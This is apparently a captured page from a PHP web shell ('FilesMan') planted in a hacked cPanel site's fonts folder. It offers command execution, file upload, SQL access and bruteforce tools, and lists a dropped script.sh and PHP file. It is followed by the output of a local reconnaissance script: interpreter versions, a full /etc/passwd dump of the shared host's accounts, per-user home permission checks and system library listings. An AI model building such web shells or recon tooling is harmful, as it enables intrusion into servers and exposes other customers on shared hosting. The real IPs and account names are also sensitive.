2013-11-11 16:58:31<br>500.00 GB <span>Free:</span> 469.46 GB (93%)<br><a href='#' onclick='g("FilesMan","/")'>/</a><a href='#' onclick='g("FilesMan","/home/")'>home/</a><a href='#' onclick='g("FilesMan","/home/ohrankac/")'>ohrankac/</a><a href='#' onclick='g("FilesMan","/home/ohrankac/public_html/")'>public_html/</a><a href='#' onclick='g("FilesMan","/home/ohrankac/public_html/fonts/")'>fonts/</a> <font color=#25ff00>drwxr-xr-x</font> <a href=# onclick="g('FilesMan','/home/ohrankac/public_html/fonts','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" selected>Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br>46.4.17.150<br><span>Client IP:</span><br>176.104.69.175</nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="10%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="10%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="10%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="10%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="10%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="10%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="10%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="10%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="10%">[ <a href="#" onclick="g('Logout',null,'','','')">Logout</a> ]</th><th width="10%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script><script>
function sa() {
for(i=0;i<d.files.elements.length;i++)
if(d.files.elements[i].type == 'checkbox')
d.files.elements[i].checked = d.files.elements[0].checked;
}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_0")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_0")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_0")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_0")'>Permissions</a></th><th>Actions</th></tr><tr><td><input type=checkbox name="f[]" value="." class=chkbx></td><td><a href=# onclick="g('FilesMan','/home/ohrankac/public_html/fonts/.');" ><b>[ . ]</b></a></td><td>dir</td><td>2013-11-11 16:58:14</td><td>ohrankac/ohrankac</td><td><a href=# onclick="g('FilesTools',null,'.','chmod')"><font color=#25ff00>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'.', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'.', 'touch')">T</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value=".." class=chkbx></td><td><a href=# onclick="g('FilesMan','/home/ohrankac/public_html/fonts/..');" ><b>[ .. ]</b></a></td><td>dir</td><td>2013-11-06 10:39:18</td><td>ohrankac/nobody</td><td><a href=# onclick="g('FilesTools',null,'..','chmod')"><font color=#25ff00>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'..', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'..', 'touch')">T</a></td></tr><tr><td><input type=checkbox name="f[]" value="3141189.eot" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'3141189.eot', 'view')">3141189.eot</a></td><td>53.06 KB</td><td>2013-09-04 01:08:21</td><td>ohrankac/ohrankac</td><td><a href=# onclick="g('FilesTools',null,'3141189.eot','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'3141189.eot', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'3141189.eot', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'3141189.eot', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'3141189.eot', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="3141189.svg" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'3141189.svg', 'view')">3141189.svg</a></td><td>97.34 KB</td><td>2013-09-04 01:08:24</td><td>ohrankac/ohrankac</td><td><a href=# onclick="g('FilesTools',null,'3141189.svg','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'3141189.svg', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'3141189.svg', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'3141189.svg', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'3141189.svg', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="3141189.ttf" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'3141189.ttf', 'view')">3141189.ttf</a></td><td>52.83 KB</td><td>2013-09-04 01:08:25</td><td>ohrankac/ohrankac</td><td><a href=# onclick="g('FilesTools',null,'3141189.ttf','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'3141189.ttf', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'3141189.ttf', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'3141189.ttf', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'3141189.ttf', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="3141189.woff" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'3141189.woff', 'view')">3141189.woff</a></td><td>25.39 KB</td><td>2013-09-04 01:08:28</td><td>ohrankac/ohrankac</td><td><a href=# onclick="g('FilesTools',null,'3141189.woff','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'3141189.woff', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'3141189.woff', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'3141189.woff', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'3141189.woff', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="eccbc8.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'eccbc8.php', 'view')">eccbc8.php</a></td><td>125.09 KB</td><td>2013-10-13 22:47:25</td><td>ohrankac/ohrankac</td><td><a href=# onclick="g('FilesTools',null,'eccbc8.php','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'eccbc8.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'eccbc8.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'eccbc8.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'eccbc8.php', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="res.txt" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'res.txt', 'view')">res.txt</a></td><td>31.45 KB</td><td>2013-11-11 16:58:31</td><td>ohrankac/ohrankac</td><td><a href=# onclick="g('FilesTools',null,'res.txt','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'res.txt', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'res.txt', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'res.txt', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'res.txt', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="script.sh" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'script.sh', 'view')">script.sh</a></td><td>6.21 KB</td><td>2013-11-11 16:58:07</td><td>ohrankac/ohrankac</td><td><a href=# onclick="g('FilesTools',null,'script.sh','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'script.sh', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'script.sh', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'script.sh', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'script.sh', 'download')">D</a></td></tr><tr><td colspan=7>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='/home/ohrankac/public_html/fonts/'>
<input type=hidden name=charset value='Windows-1251'>
<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option><option value='tar'>Compress (tar.gz)</option></select> <input type='submit' value='>>'></td></tr></form></table></div></div><table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/home/ohrankac/public_html/fonts/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color='green'>(Writeable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color='green'>(Writeable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/home/ohrankac/public_html/fonts/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value='Windows-1251'>
<span>Upload file:</span> <font color='green'>(Writeable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
</tr></table></div></body></html>[+] Perl
This is perl, v5.8.8 built for x86_64-linux
Copyright 1987-2006, Larry Wall
Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.
Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl". If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.
[+]gcc -v
[+]Ruby -v
**************************************************
* users info *
* *
**************************************************
[+] All users:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
saslauth:x:499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
cpanel:x:32001:32001::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
cpanelhorde:x:32002:32002::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32003:32003::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32004:32004::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32005:32005::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
mailman:x:32006:32006::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:498:498:MySQL server:/var/lib/mysql:/sbin/nologin
cpaneleximfilter:x:32007:32009::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
econom:x:501:501::/home/econom:/usr/local/cpanel/bin/noshell
voice:x:503:503::/home/voice:/usr/local/cpanel/bin/noshell
asadov:x:504:504::/home/asadov:/usr/local/cpanel/bin/noshell
jinakiss:x:518:517::/home/jinakiss:/usr/local/cpanel/bin/noshell
superpai:x:520:519::/home/superpai:/usr/local/cpanel/bin/noshell
ohrankac:x:522:521::/home/ohrankac:/usr/local/cpanel/bin/noshell
centersp:x:525:524::/home/centersp:/usr/local/cpanel/bin/noshell
beemoney:x:529:528::/home/beemoney:/usr/local/cpanel/bin/noshell
cpanellogin:x:505:502::/var/cpanel/userhomes/cpanellogin:/usr/local/cpanel/bin/noshell
cpanellogaholic:x:506:505::/var/cpanel/userhomes/cpanellogaholic:/usr/local/cpanel/bin/noshell
mamedov:x:530:529::/home/mamedov:/usr/local/cpanel/bin/noshell
xalq:x:533:532::/home/xalq:/usr/local/cpanel/bin/noshell
devidain:x:534:533::/home/devidain:/bin/false
malik:x:536:535::/home/malik:/usr/local/cpanel/bin/noshell
cpaneleximscanner:x:507:506::/var/cpanel/userhomes/cpaneleximscanner:/usr/local/cpanel/bin/noshell
cpanelphpgadmin:x:508:507::/var/cpanel/userhomes/cpanelphpgadmin:/usr/local/cpanel/bin/noshell
yankeego:x:544:543::/home/yankeego:/bin/false
freemont:x:547:546::/home/freemont:/usr/local/cpanel/bin/noshell
rossiaor:x:548:547::/home/rossiaor:/bin/false
inetplus:x:550:549::/home/inetplus:/usr/local/cpanel/bin/noshell
kurtlara:x:551:550::/home/kurtlara:/bin/false
bkonlnne:x:552:551::/home/bkonlnne:/usr/local/cpanel/bin/noshell
ftpmusik:x:554:553::/home/ftpmusik:/usr/local/cpanel/bin/noshell
oldarena:x:555:554::/home/oldarena:/usr/local/cpanel/bin/noshell
abfavour:x:556:555::/home/abfavour:/usr/local/cpanel/bin/noshell
dovenull:x:497:497:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
cpses:x:496:496::/var/cpanel/cpses:/sbin/nologin
[+]Chek HOMEs for users with UID>500:
[+]check perm cpanel(uid=32001;gid=32001) HOME=/var/cpanel/userhomes/cpanel:
drwx--x--x 7 cpanel cpanel 4.0K 2011-12-12 10:54:14.000000000 +0400 /var/cpanel/userhomes/cpanel
[+]check perm cpanelhorde(uid=32002;gid=32002) HOME=/var/cpanel/userhomes/cpanelhorde:
drwx--x--x 4 cpanelhorde cpanelhorde 4.0K 2011-09-29 05:36:59.000000000 +0500 /var/cpanel/userhomes/cpanelhorde
[+]check perm cpanelphpmyadmin(uid=32003;gid=32003) HOME=/var/cpanel/userhomes/cpanelphpmyadmin:
drwx--x--x 4 cpanelphpmyadmin cpanelphpmyadmin 4.0K 2011-09-29 05:36:59.000000000 +0500 /var/cpanel/userhomes/cpanelphpmyadmin
[+]check perm cpanelphppgadmin(uid=32004;gid=32004) HOME=/var/cpanel/userhomes/cpanelphppgadmin:
drwx--x--x 4 cpanelphppgadmin cpanelphppgadmin 4.0K 2011-09-29 05:36:59.000000000 +0500 /var/cpanel/userhomes/cpanelphppgadmin
[+]check perm cpanelroundcube(uid=32005;gid=32005) HOME=/var/cpanel/userhomes/cpanelroundcube:
drwx--x--x 4 cpanelroundcube cpanelroundcube 4.0K 2011-09-29 05:36:59.000000000 +0500 /var/cpanel/userhomes/cpanelroundcube
[+]check perm mailman(uid=32006;gid=32006) HOME=/usr/local/cpanel/3rdparty/mailman/mailman:
drwxrwsr-x 3 mailman mailman 4.0K 2011-09-29 04:55:34.000000000 +0500 /usr/local/cpanel/3rdparty/mailman/mailman
[+]check perm cpaneleximfilter(uid=32007;gid=32009) HOME=/var/cpanel/userhomes/cpaneleximfilter:
drwx--x--x 3 cpaneleximfilter cpaneleximfilter 4.0K 2011-09-29 05:36:34.000000000 +0500 /var/cpanel/userhomes/cpaneleximfilter
[+]check perm econom(uid=501;gid=501) HOME=/home/econom:
drwx--x--x 24 econom econom 4.0K 2013-11-11 03:11:40.000000000 +0400 /home/econom
[+]check perm voice(uid=503;gid=503) HOME=/home/voice:
drwx--x--x 14 voice voice 4.0K 2013-11-11 03:49:39.000000000 +0400 /home/voice
[+]check perm asadov(uid=504;gid=504) HOME=/home/asadov:
drwx--x--x 11 asadov asadov 4.0K 2013-11-11 01:00:08.000000000 +0400 /home/asadov
[+]check perm jinakiss(uid=518;gid=517) HOME=/home/jinakiss:
drwx--x--x 12 jinakiss jinakiss 4.0K 2013-11-11 03:16:53.000000000 +0400 /home/jinakiss
[+]check perm superpai(uid=520;gid=519) HOME=/home/superpai:
drwx--x--x 17 superpai superpai 4.0K 2013-11-11 03:48:23.000000000 +0400 /home/superpai
[+]check perm ohrankac(uid=522;gid=521) HOME=/home/ohrankac:
drwx--x--x 13 ohrankac ohrankac 4.0K 2013-11-11 03:34:39.000000000 +0400 /home/ohrankac
[+]check perm centersp(uid=525;gid=524) HOME=/home/centersp:
drwx--x--x 11 centersp centersp 4.9M 2013-11-11 01:00:58.000000000 +0400 /home/centersp
[+]check perm beemoney(uid=529;gid=528) HOME=/home/beemoney:
drwx--x--x 16 beemoney beemoney 4.0K 2013-11-11 01:00:20.000000000 +0400 /home/beemoney
[+]check perm cpanellogin(uid=505;gid=502) HOME=/var/cpanel/userhomes/cpanellogin:
drwx--x--x 4 cpanellogin cpanellogin 4.0K 2012-04-05 18:18:28.000000000 +0500 /var/cpanel/userhomes/cpanellogin
[+]check perm cpanellogaholic(uid=506;gid=505) HOME=/var/cpanel/userhomes/cpanellogaholic:
drwx--x--x 3 cpanellogaholic cpanellogaholic 4.0K 2012-04-05 18:16:23.000000000 +0500 /var/cpanel/userhomes/cpanellogaholic
[+]check perm mamedov(uid=530;gid=529) HOME=/home/mamedov:
drwx--x--x 13 mamedov mamedov 4.0K 2013-11-11 03:34:00.000000000 +0400 /home/mamedov
[+]check perm xalq(uid=533;gid=532) HOME=/home/xalq:
drwx--x--x 13 xalq xalq 4.0K 2013-11-11 04:41:50.000000000 +0400 /home/xalq
[+]check perm devidain(uid=534;gid=533) HOME=/home/devidain:
drwx--x--x 11 devidain devidain 4.0K 2013-11-11 03:11:30.000000000 +0400 /home/devidain
[+]check perm malik(uid=536;gid=535) HOME=/home/malik:
drwx--x--x 12 malik malik 4.0K 2013-11-11 03:33:50.000000000 +0400 /home/malik
[+]check perm cpaneleximscanner(uid=507;gid=506) HOME=/var/cpanel/userhomes/cpaneleximscanner:
drwx--x--x 3 cpaneleximscanner cpaneleximscanner 4.0K 2012-10-30 03:50:44.000000000 +0400 /var/cpanel/userhomes/cpaneleximscanner
[+]check perm cpanelphpgadmin(uid=508;gid=507) HOME=/var/cpanel/userhomes/cpanelphpgadmin:
drwx--x--x 3 cpanelphpgadmin cpanelphpgadmin 4.0K 2012-10-30 03:50:44.000000000 +0400 /var/cpanel/userhomes/cpanelphpgadmin
[+]check perm yankeego(uid=544;gid=543) HOME=/home/yankeego:
drwx--x--x 12 yankeego yankeego 4.0K 2013-11-11 05:59:26.000000000 +0400 /home/yankeego
[+]check perm freemont(uid=547;gid=546) HOME=/home/freemont:
drwx--x--x 12 freemont freemont 4.0K 2013-11-11 03:16:14.000000000 +0400 /home/freemont
[+]check perm rossiaor(uid=548;gid=547) HOME=/home/rossiaor:
drwx--x--x 10 rossiaor rossiaor 4.0K 2013-11-11 03:48:17.000000000 +0400 /home/rossiaor
[+]check perm inetplus(uid=550;gid=549) HOME=/home/inetplus:
drwx--x--x 21 inetplus inetplus 4.0K 2013-11-11 03:16:25.000000000 +0400 /home/inetplus
[+]check perm kurtlara(uid=551;gid=550) HOME=/home/kurtlara:
drwx--x--x 12 kurtlara kurtlara 4.0K 2013-11-11 03:33:03.000000000 +0400 /home/kurtlara
[+]check perm bkonlnne(uid=552;gid=551) HOME=/home/bkonlnne:
drwx--x--x 12 bkonlnne bkonlnne 4.0K 2013-11-11 01:00:39.000000000 +0400 /home/bkonlnne
[+]check perm ftpmusik(uid=554;gid=553) HOME=/home/ftpmusik:
drwx--x--x 12 ftpmusik ftpmusik 4.0K 2013-11-11 03:16:19.000000000 +0400 /home/ftpmusik
[+]check perm oldarena(uid=555;gid=554) HOME=/home/oldarena:
drwx--x--x 11 oldarena oldarena 4.0K 2013-11-11 03:47:37.000000000 +0400 /home/oldarena
[+]check perm abfavour(uid=556;gid=555) HOME=/home/abfavour:
drwx--x--x 12 abfavour abfavour 4.0K 2013-11-11 01:00:03.000000000 +0400 /home/abfavour
**************************************************
* library info *
* *
**************************************************
[+]LIBC:
2012-08-13 /lib/libc-2.12.so
[+]ALL from /lib /lib64 (sort -u):
-rw-r--r-- 1 root root 65 2011-12-07 23:13:53.000000000 +0400 .libfipscheck.so.1.1.0.hmac
-rw-r--r-- 1 root root 65 2011-12-07 23:15:49.000000000 +0400 .libgcrypt.so.11.hmac
-rw-r--r-- 1 root root 478 2011-12-08 04:27:00.000000000 +0400 libfreebl3.chk
-rw-r--r-- 1 root root 478 2011-12-08 04:24:02.000000000 +0400 libfreebl3.chk
-rwxr-xr-x 1 root root 10K 2011-12-07 22:07:30.000000000 +0400 libkeyutils.so.1.3
-rwxr-xr-x 1 root root 11K 2011-12-07 23:13:53.000000000 +0400 libfipscheck.so.1.1.0
-rwxr-xr-x 1 root root 12K 2011-07-19 04:07:26.000000000 +0500 libgmodule-2.0.so.0.2200.5
-rwxr-xr-x 1 root root 14K 2011-12-07 21:37:21.000000000 +0400 libgpg-error.so.0.5.0
-rwxr-xr-x 1 root root 15K 2012-02-25 01:54:16.000000000 +0400 libplds4.so
-rwxr-xr-x 1 root root 15K 2012-04-16 14:05:06.000000000 +0500 libpam_misc.so.0.82.0
-rwxr-xr-x 1 root root 15K 2012-04-16 14:05:06.000000000 +0500 libpamc.so.0.82.1
-rwxr-xr-x 1 root root 15K 2012-06-22 13:55:13.000000000 +0500 libcom_err.so.2.1
-rwxr-xr-x 1 root root 15K 2012-08-13 19:05:26.000000000 +0500 libutil-2.12.so
-rwxr-xr-x 1 root root 16K 2011-12-08 00:57:13.000000000 +0400 libuuid.so.1.3.0
-rwxr-xr-x 1 root root 17K 2011-12-08 00:04:01.000000000 +0400 libcap.so.2.16
-rwxr-xr-x 1 root root 18K 2011-04-23 22:06:40.000000000 +0500 libevtlog.so.0.0.0
-rwxr-xr-x 1 root root 18K 2011-07-19 04:07:26.000000000 +0500 libgthread-2.0.so.0.2200.5
-rwxr-xr-x 1 root root 19K 2011-06-25 08:49:32.000000000 +0500 libcap-ng.so.0.0.0
-rwxr-xr-x 1 root root 19K 2011-09-23 23:53:58.000000000 +0500 libattr.so.1.1.0
-rwxr-xr-x 1 root root 19K 2011-12-08 01:48:35.000000000 +0400 libldif-2.4.so.2.5.6
-rwxr-xr-x 1 root root 19K 2012-02-25 01:54:16.000000000 +0400 libplc4.so
-rwxr-xr-x 1 root root 19K 2012-08-13 19:05:24.000000000 +0500 libanl-2.12.so
-rwxr-xr-x 1 root root 20K 2012-08-13 19:05:25.000000000 +0500 libdl-2.12.so
-rwxr-xr-x 1 root root 22K 2012-08-13 19:05:24.000000000 +0500 libSegFault.so
-rwxr-xr-x 1 root root 24K 2012-08-13 19:05:25.000000000 +0500 libnss_hesiod-2.12.so
-rwxr-xr-x 1 root root 25K 2011-12-08 04:15:56.000000000 +0400 libnss_winbind.so.2
-rwxr-xr-x 1 root root 26K 2012-02-25 09:26:45.000000000 +0400 libip4tc.so.0.0.0
-rwxr-xr-x 1 root root 27K 2012-06-22 13:55:13.000000000 +0500 libss.so.2.0
-rwxr-xr-x 1 root root 27K 2012-08-13 19:05:24.000000000 +0500 libnss_dns-2.12.so
-rwxr-xr-x 1 root root 28K 2012-02-25 09:26:45.000000000 +0400 libip6tc.so.0.0.0
-rwxr-xr-x 1 root root 28K 2012-06-22 13:55:13.000000000 +0500 libe2p.so.2.3
-rwxr-xr-x 1 root root 31K 2011-12-07 20:53:53.000000000 +0400 libacl.so.1.1.0
-rwxr-xr-x 1 root root 32K 2012-02-25 09:26:45.000000000 +0400 libxtables.so.4.0.0
-rwxr-xr-x 1 root root 34K 2012-08-13 19:05:24.000000000 +0500 libthread_db-1.0.so
-rwxr-xr-x 1 root root 36K 2010-08-21 10:30:58.000000000 +0500 libpopt.so.0.0.0
-rwxr-xr-x 1 root root 36K 2011-07-19 13:22:02.000000000 +0500 libgssglue.so.1.0.0
-rwxr-xr-x 1 root root 39K 2011-12-07 21:40:52.000000000 +0400 libnih-dbus.so.1.0.0
-rwxr-xr-x 1 root root 40K 2011-12-07 21:45:47.000000000 +0400 libwrap.so.0.7.6
-rwxr-xr-x 1 root root 40K 2012-08-13 19:05:25.000000000 +0500 libcrypt-2.12.so
-rwxr-xr-x 1 root root 42K 2012-08-13 19:05:26.000000000 +0500 libnss_compat-2.12.so
-rwxr-xr-x 1 root root 43K 2012-08-13 19:05:25.000000000 +0500 librt-2.12.so
-rwxr-xr-x 1 root root 43K 2012-09-19 15:40:48.000000000 +0500 libkrb5support.so.0.1
-rwxr-xr-x 1 root root 52K 2012-08-13 19:05:24.000000000 +0500 libnss_nis-2.12.so
-rwxr-xr-x 1 root root 55K 2012-04-16 14:05:06.000000000 +0500 libpam.so.0.82.2
-rwxr-xr-x 1 root root 59K 2011-12-08 05:14:35.000000000 +0400 libauparse.so.0.0.0
-rwxr-xr-x 1 root root 60K 2011-12-08 01:48:35.000000000 +0400 liblber-2.4.so.2.5.6
-rwxr-xr-x 1 root root 61K 2011-12-08 00:57:13.000000000 +0400 libmount.so.1.1.0
-rwxr-xr-x 1 root root 61K 2012-08-13 19:05:24.000000000 +0500 libnss_nisplus-2.12.so
-rwxr-xr-x 1 root root 62K 2011-12-08 00:45:42.000000000 +0400 libproc-3.2.8.so
-rwxr-xr-x 1 root root 65K 2012-08-13 19:05:25.000000000 +0500 libnss_files-2.12.so
-rwxr-xr-x 1 root root 67K 2011-06-25 06:45:55.000000000 +0500 libbz2.so.1.0.4
-rwxr-xr-x 1 root root 87K 2011-12-07 21:54:41.000000000 +0400 libz.so.1.2.3
-rwxr-xr-x 1 root root 88K 2010-12-29 01:11:01.000000000 +0400 libnet.so.1.6.0
-rwxr-xr-x 1 root root 89K 2012-06-22 13:07:08.000000000 +0500 libgcc_s-4.4.6-20120305.so.1
-rwxr-xr-x 1 root root 95K 2011-12-08 05:14:35.000000000 +0400 libaudit.so.1.0.0
-rwxr-xr-x 1 root root 1.1M 2010-11-11 07:07:19.000000000 +0400 libdb_cxx-4.2.so
-rwxr-xr-x 1 root root 1.1M 2010-11-11 07:07:19.000000000 +0400 libdb_cxx-4.3.so
-rwxr-xr-x 1 root root 1.5M 2012-04-04 18:42:11.000000000 +0500 libdb-4.7.so
-rwxr-xr-x 1 root root 1.9M 2012-08-13 19:05:25.000000000 +0500 libc-2.12.so
-rwxr-xr-x 1 root root 100K 2011-12-07 21:40:52.000000000 +0400 libnih.so.1.0.0
-rwxr-xr-x 1 root root 109K 2012-08-13 19:05:25.000000000 +0500 libresolv-2.12.so
-rwxr-xr-x 1 root root 111K 2012-08-13 19:05:25.000000000 +0500 libnsl-2.12.so
-rwxr-xr-x 1 root root 11K 2011-07-19 04:04:26.000000000 +0500 libgmodule-2.0.so.0.2200.5
-rwxr-xr-x 1 root root 120K 2011-12-08 04:24:16.000000000 +0400 libselinux.so.1
-rwxr-xr-x 1 root root 129K 2012-09-19 15:40:48.000000000 +0500 libgssrpc.so.4.1
-rwxr-xr-x 1 root root 133K 2010-08-18 20:42:28.000000000 +0500 libtinfo.so.5.7
-rwxr-xr-x 1 root root 133K 2011-12-08 00:57:13.000000000 +0400 libblkid.so.1.1.0
-rwxr-xr-x 1 root root 137K 2010-08-18 20:42:28.000000000 +0500 libncurses.so.5.7
-rwxr-xr-x 1 root root 13K 2012-08-13 18:41:08.000000000 +0500 libutil-2.12.so
-rwxr-xr-x 1 root root 140K 2012-08-13 19:05:25.000000000 +0500 libpthread-2.12.so
-rwxr-xr-x 1 root root 14K 2012-06-22 13:53:53.000000000 +0500 libcom_err.so.2.1
-rwxr-xr-x 1 root root 14K 2012-08-13 18:41:06.000000000 +0500 libanl-2.12.so
-rwxr-xr-x 1 root root 151K 2012-08-13 19:05:24.000000000 +0500 ld-2.12.so
-rwxr-xr-x 1 root root 159K 2011-12-07 23:32:04.000000000 +0400 libtirpc.so.1.0.10
-rwxr-xr-x 1 root root 162K 2012-06-13 20:01:40.000000000 +0500 libexpat.so.1.5.2
-rwxr-xr-x 1 root root 16K 2011-07-19 04:04:26.000000000 +0500 libgthread-2.0.so.0.2200.5
-rwxr-xr-x 1 root root 175K 2012-09-19 15:40:48.000000000 +0500 libk5crypto.so.3.1
-rwxr-xr-x 1 root root 178K 2010-08-19 09:42:09.000000000 +0500 libpcre.so.0.0.1
-rwxr-xr-x 1 root root 189K 2010-08-18 20:42:28.000000000 +0500 libncursesw.so.5.7
